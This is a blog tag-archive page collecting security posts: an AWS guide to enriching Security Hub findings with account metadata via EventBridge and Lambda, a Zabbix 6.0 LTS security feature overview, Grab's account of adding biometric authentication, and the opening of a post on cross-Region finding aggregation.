Tag Archives: security

How to enrich AWS Security Hub findings with account metadata

Post Syndicated from Siva Rajamani original https://aws.amazon.com/blogs/security/how-to-enrich-aws-security-hub-findings-with-account-metadata/

In this blog post, we’ll walk you through how to deploy a solution to enrich AWS Security Hub findings with additional account-related metadata, such as the account name, the organizational unit (OU) associated with the account, security contact information, and account tags. Account metadata can help you search findings, create insights, and better respond to and remediate findings.

AWS Security Hub ingests findings from multiple AWS services, including Amazon GuardDuty, Amazon Inspector, Amazon Macie, AWS Firewall Manager, AWS Identity and Access Management (IAM) Access Analyzer, and AWS Systems Manager Patch Manager. Findings from each service are normalized into the AWS Security Finding Format (ASFF), so you can review findings in a standardized format and take action quickly. You can use AWS Security Hub to provide a single view of all security-related findings, and to set up alerts, automate remediation, and export specific findings to third‑party incident management systems.

The Security or DevOps teams responsible for investigating, responding to, and remediating Security Hub findings may need additional account metadata beyond the account ID to determine what to do about the finding or where to route it. For example, determining whether the finding originated from a development or production account can be key to determining its priority and the type of remediation action needed. Having this metadata in the finding also allows customers to create custom insights in Security Hub to track which OUs or applications (based on account tags) have the most open security issues. This blog post demonstrates a solution to enrich your findings with account metadata to help your Security and DevOps teams better understand and improve their security posture.

Solution Overview

In this solution, you will use a combination of AWS Security Hub, Amazon EventBridge, and AWS Lambda to ingest the findings and automatically enrich them with account-related metadata by querying the AWS Organizations and Account Management service APIs. The solution architecture is shown in Figure 1 below:

Figure 1: Solution architecture and workflow for metadata enrichment

The solution workflow includes the following steps:

  1. New findings and updates to existing Security Hub findings from all the member accounts flow into the Security Hub administrator account. Security Hub generates Amazon EventBridge events for the findings.
  2. An EventBridge rule, created in the Security Hub administrator account as part of the solution, triggers a Lambda function configured as its target every time an EventBridge notification for a new or updated finding imported into Security Hub matches the rule shown below:
    {
      "detail-type": ["Security Hub Findings - Imported"],
      "source": ["aws.securityhub"],
      "detail": {
        "findings": {
          "RecordState": ["ACTIVE"],
          "UserDefinedFields": {
            "findingEnriched": [{
              "exists": false
            }]
          }
        }
      }
    }

  3. The Lambda function uses the account ID from the event payload to retrieve both the account information and the alternate contact information from the AWS Organizations and Account Management service APIs. The following code within helper.py constructs the account_details object representing the account information used to enrich the finding (a hypothetical sketch of the AwsHelper class this code relies on appears after this list of steps):
    def get_account_details(account_id, role_name):
        account_details = {}
        organizations_client = AwsHelper().get_client('organizations')
        response = organizations_client.describe_account(AccountId=account_id)
        account_details["Name"] = response["Account"]["Name"]
        response = organizations_client.list_parents(ChildId=account_id)
        ou_id = response["Parents"][0]["Id"]
        if ou_id and response["Parents"][0]["Type"] == "ORGANIZATIONAL_UNIT":
            response = organizations_client.describe_organizational_unit(OrganizationalUnitId=ou_id)
            account_details["OUName"] = response["OrganizationalUnit"]["Name"]
        elif ou_id:
            account_details["OUName"] = "ROOT"
        if role_name:
            account_client = AwsHelper().get_session_for_role(role_name).client("account")
        else:
            account_client = AwsHelper().get_client('account')
        try:
            response = account_client.get_alternate_contact(
                AccountId=account_id,
                AlternateContactType='SECURITY'
            )
            if response['AlternateContact']:
                print("contact :{}".format(str(response["AlternateContact"])))
                account_details["AlternateContact"] = response["AlternateContact"]
        except account_client.exceptions.AccessDeniedException as error:
            #Potentially due to calling alternate contact on Org Management account
            print(error.response['Error']['Message'])
        
        response = organizations_client.list_tags_for_resource(ResourceId=account_id)
        results = response["Tags"]
        while "NextToken" in response:
            response = organizations_client.list_tags_for_resource(ResourceId=account_id, NextToken=response["NextToken"])
            results.extend(response["Tags"])
        
        account_details["tags"] = results
        AccountHelper.logger.info("account_details: %s" , str(account_details))
        return account_details

  4. The Lambda function updates the finding using the Security Hub BatchUpdateFindings API to add the account-related data into the Note and UserDefinedFields attributes of the Security Hub finding:
    # Look up and build the finding Note and UserDefinedFields based on the account ID
    enrichment_text, tags_dict = enrich_finding(account_id, assume_role_name)
    logger.debug("Text to post: %s" , enrichment_text)
    logger.debug("User defined Fields %s" , json.dumps(tags_dict))
    # Add the Note to the finding and add a UserDefinedFields entry that the EventBridge rule uses to prevent repeat lookups
    response = secHubClient.batch_update_findings(
        FindingIdentifiers=[
            {
                'Id': enrichment_finding_id,
                'ProductArn': enrichment_finding_arn
            }
        ],
        Note={
            'Text': enrichment_text,
            'UpdatedBy': enrichment_author
        },
        UserDefinedFields=tags_dict
    )

    Note: All state change events published by AWS services through Amazon EventBridge are free of charge. At the time of publication of this post, the AWS Lambda free tier includes 1M free requests per month and 400,000 GB-seconds of compute time per month. If you process 2M requests per month, the estimated cost for this solution would be approximately $7.20 USD per month.
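
  The helper.py excerpt above relies on an AwsHelper class that is not shown in this post. As a rough, hypothetical sketch based only on how the class is called above (the actual implementation in the solution repository may differ), it could look something like this:

    import boto3

    class AwsHelper:
        """Hypothetical helper that wraps boto3 client creation and cross-account role assumption."""

        def get_client(self, service_name):
            # Plain client in the Lambda function's own account and Region
            return boto3.client(service_name)

        def get_session_for_role(self, role_name):
            # Assume the role in the Organizations management account; role_name is
            # assumed here to be the full ARN of the role created for the solution
            sts_client = boto3.client("sts")
            response = sts_client.assume_role(
                RoleArn=role_name,
                RoleSessionName="SecurityHubFindingEnrichment"
            )
            credentials = response["Credentials"]
            return boto3.Session(
                aws_access_key_id=credentials["AccessKeyId"],
                aws_secret_access_key=credentials["SecretAccessKey"],
                aws_session_token=credentials["SessionToken"]
            )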

  Prerequisites

    1. Your AWS organization must have all features enabled.
    2. This solution requires that you have AWS Security Hub enabled in an AWS multi-account environment which is integrated with AWS Organizations. The AWS Organizations management account must designate a Security Hub administrator account, which can view data from and manage configuration for its member accounts. Follow these steps to designate a Security Hub administrator account for your AWS organization.
    3. All member accounts are tagged according to your organization’s tagging strategy, and their security alternate contact information is filled in. If the tags or alternate contacts are not available, the enrichment will be limited to the account name and the organizational unit name.
    4. Trusted access must be enabled with AWS Organizations for the AWS Account Management service. This enables the AWS Organizations management account to call the AWS Account Management API operations (such as GetAlternateContact) for other member accounts in the organization. Trusted access can be enabled either by using the AWS Management Console or by using the AWS CLI and SDKs.

      The following AWS CLI example enables trusted access for AWS Account Management in the calling account’s organization.

      aws organizations enable-aws-service-access --service-principal account.amazonaws.com

    5. An IAM role with read-only access to look up the GetAlternateContact details must be created in the Organizations management account, with a trust policy that allows the Security Hub administrator account to assume the role.

    Solution Deployment

    This solution consists of two parts:

    1. Create an IAM role in your Organizations management account, giving it the necessary permissions as described in the Create the IAM role procedure below.
    2. Deploy the Lambda function and the other associated resources to your Security Hub administrator account.

    Create the IAM role

    Using the console, AWS CLI, or AWS API

    Follow the Creating a role to delegate permissions to an IAM user instructions to create an IAM role named account-contact-readonly in the AWS Organizations management account using the console, AWS CLI, or AWS API, based on the trust and permission policy templates provided below. You will need the account ID of your Security Hub administrator account.

    The IAM trust policy allows the Security Hub administrator account to assume the role in your Organization management account.

    IAM Role trust policy

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Principal": {
            "AWS": "arn:aws:iam::<SH administrator Account ID>:root"
          },
          "Action": "sts:AssumeRole",
          "Condition": {}
        }
      ]
    }

    Note: Replace <SH administrator Account ID> with the account ID of your Security Hub administrator account. Once the solution is deployed, you should update the principal in the trust policy shown above to use the new IAM role created for the solution.

    IAM Permission Policy

    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": [
                    "account:GetAlternateContact"
                ],
                "Resource": "arn:aws:account::<Org. Management Account id>:account/o-*/*"
            }
        ]
    }

    The IAM permission policy allows the Security Hub administrator account to look up the alternate contact information for the member accounts.

    Make a note of the Role ARN for the IAM role similar to this format:

    arn:aws:iam::<Org. Management Account id>:role/account-contact-readonly

    You will need this when deploying the solution in the next procedure.

    Using AWS CloudFormation

    Alternatively, you can use the provided CloudFormation template to create the role in the management account. The IAM role ARN is available in the Outputs section of the created CloudFormation stack.

    Deploy the Solution to your Security Hub administrator account

    You can deploy the solution using either the AWS Management Console, or from the GitHub repository using the AWS SAM CLI.

    Note: If you have designated an aggregation Region within the Security Hub administrator account, you can deploy this solution only in the aggregation Region. Otherwise, you need to deploy this solution separately in each Region of the Security Hub administrator account where Security Hub is enabled.

    To deploy the solution using the AWS Management Console

    1. In your Security Hub administrator account, launch the template by choosing the Launch Stack button below, which creates the stack in the us-east-1 Region.

      Note: If your Security Hub aggregation Region is different from us-east-1, or you want to deploy the solution in a different AWS Region, you can deploy the solution from the GitHub repository described in the next section.


    2. On the Quick create stack page, for Stack name, enter a unique stack name for this account; for example, aws-security-hub-findings-enrichment-stack, as shown in Figure 2 below.
      Figure 2: Quick Create CloudFormation stack for the Solution

    3. For ManagementAccount, enter the AWS Organizations management account ID.
    4. For OrgManagementAccountContactRole, enter the role ARN of the role you created previously in the Create IAM role procedure.
    5. Choose Create stack.
    6. Once the stack is created, go to the Resources tab and take note of the name of the IAM role that was created.
    7. Update the principal element of the IAM role trust policy that you previously created in the Organizations management account in the Create the IAM role procedure above, replacing it with the role name you noted down, as shown below.
      Figure 3: Update the management account role’s trust policy

    To deploy the solution from the GitHub Repository and AWS SAM CLI

    1. Install the AWS SAM CLI
    2. Download or clone the GitHub repository using the following commands:
      $ git clone https://github.com/aws-samples/aws-security-hub-findings-account-data-enrichment.git
      $ cd aws-security-hub-findings-account-data-enrichment

    3. Update the content of the profile.txt file with the profile name you want to use for the deployment.
    4. To create a new bucket for deployment artifacts, run create-bucket.sh, specifying the Region as an argument as shown below.
      $ ./create-bucket.sh us-east-1

    5. Deploy the solution to the account by running the deploy.sh script, specifying the Region as an argument:
      $ ./deploy.sh us-east-1

    6. Once the stack is created, go to the Resources tab and take note of the name of the IAM role that was created.
    7. Update the principal element of the IAM role trust policy that you previously created in the Organizations management account in the Create the IAM role procedure above, replacing it with the role name you noted down, as shown below.
      "AWS": "arn:aws:iam::<SH Delegated Account ID>:role/<Role Name>"

    Using the enriched attributes

    To test that the solution is working as expected, you can create a standalone security group with an ingress rule that allows traffic from the internet. This will trigger a finding in Security Hub, which will be populated with the enriched attributes. You can then use these enriched attributes to filter and create custom insights, or take specific response or remediation actions.

    To generate a sample Security Hub finding using AWS CLI

    1. Create a Security Group using the following AWS CLI command:
      aws ec2 create-security-group --group-name TestSecHubEnrichmentSG --description "Test Security Hub enrichment function"

    2. Make a note of the security group ID from the output, and use it in Step 3 below.
    3. Add an ingress rule to the security group which allows unrestricted traffic on port 100:
      aws ec2 authorize-security-group-ingress --group-id <Replace Security group ID> --protocol tcp --port 100 --cidr 0.0.0.0/0

    Within a few minutes, a new finding will be generated in Security Hub, warning about the unrestricted ingress rule in the TestSecHubEnrichmentSG security group. For any new or updated finding that does not have the UserDefinedFields attribute findingEnriched set to true, the solution will enrich the finding with account-related fields in both the Note and UserDefinedFields sections of the Security Hub finding.

    To see and filter the enriched finding

    1. Go to Security Hub and choose Findings in the left-hand navigation.
    2. Click in the filter field at the top to add additional filters. Choose a filter field of AWS Account ID, a filter match type of is, and a value of the AWS Account ID where you created the TestSecHubEnrichmentSG security group.
    3. Add one more filter. Choose a filter field of Resource type, a filter match type of is, and the value of AwsEc2SecurityGroup.
    4. Identify the finding for security group TestSecHubEnrichmentSG with updates to Note and UserDefinedFields, as shown in Figures 4 and 5 below:
      Figure 4: Account metadata enrichment in Security Hub finding’s Note field

      Figure 5: Account metadata enrichment in Security Hub finding’s UserDefinedFields field

      Note: The actual attributes you will see as part of the UserDefinedFields may be different from the above screenshot. Attributes shown will depend on your tagging configuration and the alternate contact configuration. At a minimum, you will see the AccountName and OU fields.

    5. Once you confirm that the solution is working as expected, delete the stand-alone security group TestSecHubEnrichmentSG, which was created for testing purposes.

    Create custom insights using the enriched attributes

    You can use the attributes available in the UserDefinedFields of the Security Hub finding to filter findings. This lets you generate custom Security Hub insights and reports tailored to your organization’s needs. The example shown in Figure 6 below creates a custom Security Hub insight for findings grouped by severity for a specific owner, using the Owner attribute within the UserDefinedFields object of the Security Hub finding.

    Figure 6: Custom Insight with Account metadata filters
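
    If you prefer to create a similar insight programmatically, a sketch using the Security Hub CreateInsight API could look like the following. The Owner key and value are illustrative assumptions; use whichever keys your enrichment adds to UserDefinedFields:

      import boto3

      securityhub = boto3.client("securityhub")

      # Group active findings by severity for a specific owner, filtering on the
      # enriched UserDefinedFields attribute added by the solution
      response = securityhub.create_insight(
          Name="Active findings by severity for owner my-team",
          GroupByAttribute="SeverityLabel",
          Filters={
              "RecordState": [{"Value": "ACTIVE", "Comparison": "EQUALS"}],
              "UserDefinedFields": [
                  {"Key": "Owner", "Value": "my-team", "Comparison": "EQUALS"}
              ]
          }
      )
      print(response["InsightArn"])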

    EventBridge rule for response or remediation action using enriched attributes

    You can also use the attributes in the UserDefinedFields object of the Security Hub finding within an EventBridge rule to take specific response or remediation actions based on the values of those attributes. In the example below, you can see how the Environment attribute can be used within the EventBridge rule configuration to trigger specific actions only when the value matches PROD.

    {
      "detail-type": ["Security Hub Findings - Imported"],
      "source": ["aws.securityhub"],
      "detail": {
        "findings": {
          "RecordState": ["ACTIVE"],
          "UserDefinedFields": {
            "Environment": "PROD"
          }
        }
      }
    }

    Conclusion

    This blog post walks you through a solution to enrich AWS Security Hub findings with AWS account-related metadata using Amazon EventBridge notifications and AWS Lambda. By enriching the Security Hub findings with account-related information, your security teams gain better visibility, additional insights, and an improved ability to create targeted reports for specific accounts or business teams, helping them prioritize and improve their overall security response.

 
If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the AWS Security Hub forum.

Want more AWS Security news? Follow us on Twitter.

Siva Rajamani

Siva Rajamani is a Boston-based Enterprise Solutions Architect at AWS. Siva enjoys working closely with customers to accelerate their AWS cloud adoption and improve their overall security posture.

Prashob Krishnan

Prashob Krishnan is a Denver-based Technical Account Manager at AWS. Prashob is passionate about security. He enjoys working with customers to solve their technical challenges and help build a secure scalable architecture on the AWS Cloud.

Securing Zabbix 6.0 LTS by Kārlis Saliņš / Zabbix Summit Online 2021

Post Syndicated from Kārlis Saliņš original https://blog.zabbix.com/securing-zabbix-6-0-lts-by-karlis-salins-zabbix-summit-online-2021/18962/

Security is an essential dimension of any tool in your IT infrastructure, and Zabbix is no exception. With Zabbix 6.0 LTS, our users will be able to secure their Zabbix instance on multiple layers – from encrypting network communication to flexible user access control, API token provisioning, and custom user password policies. Let’s take a look at the full set of security features that Zabbix 6.0 LTS provides to its users.

The full recording of the speech is available on the official Zabbix Youtube channel.

Why do we need security?

Over time, the security standards for IT infrastructure and software have developed greatly. We now have a robust set of standards that we have to follow to ensure the uninterrupted and secure delivery of internal and external services. We also need to ensure that any sensitive information stays confidential and minimize the risk of data breaches. In the case of Zabbix, we have the ability to define a flexible set of security measures to ensure our data stays secure:

  • We can encrypt our connections between every Zabbix component to protect our data
    • Multiple encryption methods are supported
    • Zabbix administrators can configure supported cipher suites based on their company policy
  • Role-based access enables Zabbix administrators to define a flexible set of roles to restrict access to confidential information
    • This is especially vital for multi-tenant environments, where a single Zabbix instance is shared between multiple customers
  • Audit logging adds a layer of visibility that can help us detect potential security or configuration problems before they have a real impact

Security in Zabbix

Zabbix consists of multiple components – some of which are mandatory while others are optional. In the diagram below, you can see how the connection between every component can be encrypted. Users have the ability to choose which parts of their Zabbix infrastructure should be encrypted.

In addition to encrypting the communication between all of the Zabbix components, Zabbix administrators can also create flexible user roles for granular access control. The user passwords are stored in the database, encrypted by using bcrypt. With Zabbix 6.0 LTS, we can also define Zabbix password complexity policies – I’m going to cover that specific feature a bit further in this blog post.

As for your secrets – authentication credentials for your devices, SSH usernames and passwords, and other sensitive information – these can be stored in the HashiCorp Vault, which is an optional component specifically for storing your secrets in a very secure fashion.

Zabbix user types

You can have three types of users in Zabbix. Before we can talk more about user roles, we need to understand the access restrictions that these user types enforce:

  • Zabbix Super Admin
    • Unlimited access to everything
  • Zabbix Admin
    • Can create hosts and templates
    • Permission-based access to Zabbix entities
  • Zabbix User
    • Permission-based access to Zabbix entities
    • Has access only to the monitoring information
    • Has no access to configuration sections in Zabbix GUI

User roles can be used to create a role of a particular user type and further restrict the access of all users that belong to this role. For example, we can have a user role that is based on the Super Admin type but, instead of having access to every Zabbix section, we can restrict the members of this role to have access only to parts of the Zabbix Administration or Configuration sections.

Obtaining API tokens

If you plan on using the Zabbix API, the first step to executing your API workflows is issuing a user.login API call and obtaining an API token, which will be used in all future API calls until the user is logged out.

Zabbix now provides a better way of generating API tokens. You can generate them by accessing Administration – General – API tokens. Here you can generate new API tokens, select the user who can use a particular token, and define an expiration date for the token.

Once the token has been created, we will see a confirmation screen with the generated token information. You should copy and save the token here since you will not be able to obtain the token later! If you forget to save it, you can always generate a new token.

Below we can see a list of our API tokens, their expiration dates, names, users, and other information:

Using the API tokens is exactly the same as you would use them with the old approach. Simply place your token in the auth field of your API call and, if the token is valid and the user has the necessary permissions, the API call will succeed:
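
As a minimal illustration, the following Python sketch places a generated token in the auth field of a JSON-RPC request; the URL, token value, and method are placeholders that you would replace with your own:

import requests

ZABBIX_API_URL = "https://zabbix.example.com/api_jsonrpc.php"  # your frontend URL
API_TOKEN = "your-generated-api-token"

# Standard JSON-RPC request; the API token goes into the auth field
payload = {
    "jsonrpc": "2.0",
    "method": "host.get",
    "params": {"output": ["hostid", "host"]},
    "auth": API_TOKEN,
    "id": 1
}

response = requests.post(ZABBIX_API_URL, json=payload)
print(response.json())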

Secret macros

Macros can be used in many different parts of Zabbix – from using them in your triggers to create dynamic trigger thresholds to using them to define user names and passwords for different types of checks, such as SNMP, SSH, Zabbix agent checks, and many others. Now we can add an extra layer of obfuscation for our macros by creating secret macros:

  • The value of a secret macro is not displayed in the frontend
  • The value of a secret macro does not get cloned or exported with host/template export
  • Secret macros are stored in the Zabbix database
  • Database connections and access must be secured to prevent the potential attackers from obtaining these values

Zabbix + HashiCorp Vault

 

The HashiCorp Vault is an optional component that we can use for storing Zabbix secrets, thus providing an additional layer of security. The secrets are stored in the vault, and every time Zabbix reloads its configuration cache (every minute by default), the secrets are picked up from the vault:

  • HashiCorp Vault can be used for storing secrets such as authentication information and Zabbix database credentials
  • The HashiCorp Vault provides a unified interface to access any secret while ensuring tight access control and keeping a detailed audit log
  • Initially, the vault is sealed and must be unsealed using unseal keys
  • Secrets are stored in the Zabbix configuration cache
  • The values of secrets are retrieved on every Zabbix configuration cache update

Initially, we have to provide the vault token and vault URL in the Zabbix server configuration file. If we choose to store the Zabbix database credentials in the secret vault, we also have to provide the path to the location of the secret:

### Option: VaultToken
# Vault authentication token that should have been generated
# exclusively for Zabbix server with read only permission
VaultToken=verysecretrandomlygeneretedvaultstring

### Option: VaultURL
# Vault server HTTP[S] URL. System wide CA certificates directory
# will be used if SSLCALocation is not specified.
VaultURL=https://my.organization.vault:8200

### Option: VaultDBPath
# Vault path from where credentials for database will be retrieved
# by keys 'password' and 'username'.
VaultDBPath=my/secret/location

Security improvements in Zabbix 6.0 LTS

The security improvements that we discussed previously have been available in earlier non-LTS versions. If you’re migrating from Zabbix 5.0 LTS to Zabbix 6.0 LTS, all of these will be new to you. Next, let’s cover the improvements that have been added specifically in Zabbix 6.0 LTS. If you’re using the latest major Zabbix version, Zabbix 5.4, then all of the following features await you in Zabbix 6.0 LTS.

Improved Audit log

The audit log has seen some major improvements. Not only is the audit log capable of logging every operation performed by the Zabbix server and Zabbix frontend, but it has also received an internal re-design to ensure minimal possible performance impact and improved UX:

  • Improved API operation logging
  • Scalability improvements when logging a large number of audit log entries
  • Quality of life improvements when it comes to filtering the audit log
  • More types of operations are now logged in the audit log
    • Script execution
    • Global macro changes
    • Changes resulting from the execution of low-level discovery rules
    • And much more

The above image shows that not only are new types of operations being logged in the audit log, but we can also see the results of those operations, such as the results of script executions, macro changes, new users being created in Zabbix, and more.

User password complexity settings

One of the major security improvements introduced in Zabbix 6.0 LTS is the ability to define custom password complexity requirements. Zabbix administrators can select between multiple password complexity requirements and apply them to their Zabbix instance:

  • Prevent using simple passwords like password
  • Set the minimum password length
  • Prevent the usage of the name/last name/username in the password
  • Prevent the usage of easy-to-guess passwords, such as abcd1234, asdf1234
    • The password analysis is based on a dictionary of ~1 million most common passwords
  • The default Admin password on a fresh Zabbix instance is not changed – you have to update it after the new Zabbix instance is deployed!

Monitoring of certificate attributes

Another dimension of security that has improved with the release of Zabbix 6.0 LTS is security monitoring. Now we can use Zabbix Agent 2 to monitor SSL certificate attributes:

  • Zabbix Agent 2 built-in plugin for certificate monitoring available starting from Zabbix Agent 2 5.0.15
  • Collects information about the website certificate
  • Official templates are available out of the box and can be downloaded on our git page
  • web.certificate.get[hostname,<port>,<address>]

Below you can see an example of the certificate information obtained from the www.zabbix.com website. Here’s what the item key looks like for our example:

zabbix_agent2 -t web.certificate.get[www.zabbix.com]

And the output that is received by Zabbix:

As we can see, the resulting information tells us that the certificate is valid and has been verified successfully. Next, let’s take a look at a different kind of result:

Here we can see that the certificate is still valid, but we also receive a warning that it’s a self-signed certificate.

You may have noticed that the information obtained by this item comes in a JSON containing multiple values. That’s because most of the .get items obtain information in bulk. We can use this item as a master item and create multiple dependent items, each of which will collect an individual value. This can be configured by using JSONPath preprocessing.

Let’s take a look at some trigger examples that we can use together with the certificate monitoring item:

  • Check if the certificate is invalid
    • {HOST:cert.validation.str("invalid")} = 1
  • Check if the certificate expires in less than 7 days
    • ({HOST:cert.not_after.last()} - {HOST:cert.not_after.now()}) / 86400 < 7
  • Check if the Certificate fingerprint has changed
    • {TEMPLATE_NAME:cert.sha1_fingerprint.diff()}=1

User permissions in service trees

With the reworked business service monitoring, we have also added the ability to define access permissions for a particular service or multiple services that have a matching tag. Permissions can be defined for Read-only access or Read-write access.

In the example below, we can see three child services. Our user has read-only access for the first two services while having read-write permissions for the third service.

If you wish to read more about the re-designed Services section and Zabbix business service monitoring, you can find a blog post based on the Zabbix Summit 2021 speech on the topic here.

Zabbix security best practices

Finally, let’s go through a checklist of best practices that will help you to secure your environment on all levels.

  • Define proper user roles for different types of Zabbix users in your organization
    • If you have a multi-tenant Zabbix environment, make sure that each tenant can access only the information related to their organization!
  • Enable HTTPS on your Zabbix web frontend
    • Unencrypted connections to the web frontend mean that an attacker could potentially obtain sensitive information
  • Encrypt your connections to the Zabbix database
  • Use the secret vault to harden your security and store your secrets in a vault
  • Encrypt the traffic between the Zabbix server, Zabbix proxies, and Zabbix agents
    • Here you can choose between PSK and Certificate-based encryptions
    • Connections made by command-line tools like zabbix_sender can and should also be encrypted!
  • Agentless checks should also be configured in a secure manner
    • HTTP authentication and SSL for HTTP checks
    • Public key authentication for SSH checks
  • Define custom password complexity settings to prevent weak passwords for your Zabbix users
  • Define allow and deny lists for the item keys in your Zabbix agent configuration
    • This way you can restrict the collection of sensitive metrics by potential attackers
  • Use secret macros instead of displaying your macro values in plain-text
  • Keep Zabbix updated and update to the latest minor Zabbix release
    • Minor releases contain critical bug and security fixes
    • The upgrade process is extremely simple since no changes are made to the database schema in the minor version updates

Advanced Zabbix Security Administration course

If you wish to learn more about securing your Zabbix instance and get some practical experience in a controlled environment while being guided by Zabbix certified trainers – then the Advanced Zabbix Security Administration course is for you! In this course you will have the chance to learn and practice the following topics:

You can find more information about the Advanced Zabbix Security Administration course as well as the course pricing on the Zabbix website.

Questions

Q: Can we encrypt individual Zabbix components, or is it an all-or-nothing approach?

A: Connections between each component can be encrypted individually. You can, for example, encrypt only connections between Zabbix server and Zabbix proxies if you wish to do so. You can even leave connections between some proxies unencrypted, while others can be fully secured.

 

Q: Can I mix different Zabbix authentication approaches – for example, can I use LDAP together with internal authentication?

A: It is not only possible, but it’s also recommended. If you’re using LDAP authentication – always have a user with internal authentication configured for it. This will save you in situations where something goes wrong with the LDAP servers or connectivity.

The post Securing Zabbix 6.0 LTS by Kārlis Saliņš / Zabbix Summit Online 2021 appeared first on Zabbix Blog.

Biometric authentication – Why do we need it?

Post Syndicated from Grab Tech original https://engineering.grab.com/biometrics-authentication

In recent years, Identity and Access Management has gained importance within technology industries as attackers continue to target large corporations in order to gain access to private data and services. To address this issue, the Grab Identity team has been using a 6-digit PIN to authenticate a user during a sensitive transaction such as accessing a GrabPay Wallet. We also use SMS one-time passwords (OTPs) to log a user into the application.

We look at existing mechanisms that Grab uses to authenticate its users and how biometric authentication helps strengthen application security and save costs. We also look at the various technical decisions taken to ensure the robustness of this feature as well as some key learnings.

Introduction

The mechanisms we use to authenticate our users have evolved as the Grab Identity team consistently refines our approach. Over the years, we have observed several things:

  • OTP and Personal Identification Number (PIN) are susceptible to hacking and social engineering.
  • These methods have high user friction (e.g. delay or failure to receive SMS, need to launch Facebook/Google).
  • Shared/rented driver accounts cause safety concerns for passengers and increase the potential for fraud.
  • High OTP costs at $0.03/SMS.

Social engineering efforts have gotten more advanced – attackers could pretend to be your friends and ask for your OTP or even post phishing advertisements that prompt for your personal information.


With more sophisticated social engineering attacks on the rise, we need solutions that can continue to protect our users and Grab in the long run.

Background

When we looked into developing solutions for these problems, which were mainly about cost and security, we went back to basics and looked at what a secure system means.

  • Knowledge Factor: Something that you know (password, PIN, some other data)
  • Possession Factor: Something physical that you have (device, keycards)
  • Inherent Factor: Something that you are (face ID, fingerprint, voice)

We then compared the various authentication mechanisms that the Grab app currently uses, as shown in the following table:

Authentication factor 1. Something that you know 2. Something physical that you have 3. Something that you are
OTP ✔️ ✔️
Social ✔️
PIN ✔️
Biometrics ✔️ ✔️

With methods based on the knowledge and possession factors, it is still possible for attackers to get users to reveal sensitive account information. On the other hand, biometrics are something you are born with, which makes them much harder to mimic. Hence, we have added biometrics as an additional layer to enhance Grab’s existing authentication methods and build a more secure platform for our users.

Solution

Biometric authentication powered by device biometrics provides a robust platform to enhance trust. This is because modern phones provide a few key features that allow client-server trust to be established:

  1. Biometric sensor (fingerprint or face ID).
  2. Advent of devices with secure enclaves.

A secure enclave, being a part of the device, is separate from the main operating system (OS) at the kernel level. The enclave is used to store private keys that can be unlocked only by the biometrics on the device.

Any changes to device security, such as changing a PIN or adding another fingerprint, will invalidate all prior access to this secure enclave. This means that when we enroll a user in biometrics this way, we can be sure that any payload from that device which verifies against the public part of that private key was authorised by the user who created it.


Architecture details

The important part of the approach lies in the enrollment flow. The process is quite simple and can be described in the following steps:

  1. Create an elevated public/private key pair that requires user authentication.
  2. Ask users to authenticate in order to prove they are the device holders.
  3. Sign the payload with the confirmed, unlocked private key and send the public key to finish enrolling.
  4. Store the returned reference ID in the encrypted shared preferences/keychain.

Implementation

The key implementation details are as follows:

  1. Grab’s HellfireSDK confirms that the device is not rooted.
  2. Uses SHA512withECDSA as the signature algorithm.
  3. Encrypted shared preferences/keychain to store data.
  4. Secure enclave to store private keys.

These key technologies allow us to create trust between devices and services. The raw biometric data stays within the device; instead, an encrypted signature of the biometric data is sent to Grab for verification purposes.
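
To illustrate the verification step, here is a minimal sketch of how a backend service could verify a signed payload against the public key captured during enrollment, using the Python cryptography library. The function name and payload handling are illustrative assumptions, not Grab's actual implementation:

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec

def verify_biometric_signature(public_key_pem: bytes, payload: bytes, signature: bytes) -> bool:
    """Return True if the payload was signed by the private key held in the device's secure enclave."""
    public_key = serialization.load_pem_public_key(public_key_pem)
    try:
        # SHA-512 with ECDSA mirrors the SHA512withECDSA algorithm mentioned above
        public_key.verify(signature, payload, ec.ECDSA(hashes.SHA512()))
        return True
    except InvalidSignature:
        return False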

Impact

Biometric login aims to resolve many of the problems highlighted earlier in this article, such as reducing user friction and saving on SMS OTP costs.

We are still experimenting with this feature so we do not have insights on business impact yet. However, from early experiment runs, we estimate over 90% adoption rate and a success rate of nearly 90% for biometric logins.

Learnings/Conclusion

As methods of executing identity theft or social engineering get more creative, simply using passwords and PINs is not enough. Grab, and many other organisations, are realising that it’s important to augment existing security measures with methods that are inherent and unique to users.

By using biometrics as an added layer of security in a multi-factor authentication strategy, we can keep our users safe and decrease the probability of successful attacks. Not only do we ensure that the user is a legitimate entity, we also ensure that we protect their privacy by ensuring that the biometric data remains on the user’s device.

What’s next?

  • IdentitySDK – this feature will be moved into an SDK so other teams can integrate it via plug and play.
  • Standalone biometrics – biometric authentication is currently tightly coupled with PIN, i.e. biometric authentication happens in place of PIN if it is set up. Therefore, users never see both PIN and biometrics in the same session, which limits our robustness in terms of multi-factor authentication.
  • Integration with DAX and beyond – We plan to enable this feature for all teams who need to use biometric authentication.

Join us

Grab is a leading superapp in Southeast Asia, providing everyday services that matter to consumers. More than just a ride-hailing and food delivery app, Grab offers a wide range of on-demand services in the region, including mobility, food, package and grocery delivery services, mobile payments, and financial services across over 400 cities in eight countries.

Powered by technology and driven by heart, our mission is to drive Southeast Asia forward by creating economic empowerment for everyone. If this mission speaks to you, join our team today!

Best practices for cross-Region aggregation of security findings

Post Syndicated from Marshall Jones original https://aws.amazon.com/blogs/security/best-practices-for-cross-region-aggregation-of-security-findings/

AWS Security Hub enables you to have a centralized view of the security posture across your AWS environment by aggregating your security alerts from various AWS services and partner products in a standardized format so that you can more easily take action on them. To facilitate that central view, Security Hub allows you to designate an aggregation Region, which links some or all Regions to a single aggregation Region in a delegated administrator AWS account. All findings across all of your accounts and all of your linked Regions will be processed by Security Hub in this one Region. With this feature, you can take advantage of many configurations when ingesting findings into Security Hub that will benefit you operationally and provide cost savings.

This blog post provides you with a set of best practices when using Security Hub across multiple Regions. After implementing the recommendations in this blog post, you’ll have an optimized and centralized view of Security Hub findings from all integrated AWS services and partner products across all Regions in a single AWS account and Region.

Enable cross-Region aggregation

To enable cross-Region aggregation in Security Hub, you must first enable finding aggregation in Security Hub from the Region that will become the aggregation Region. You cannot use a Region that is disabled by default as your aggregation Region. For a list of Regions that are disabled by default, see Enabling a Region in the AWS General Reference.

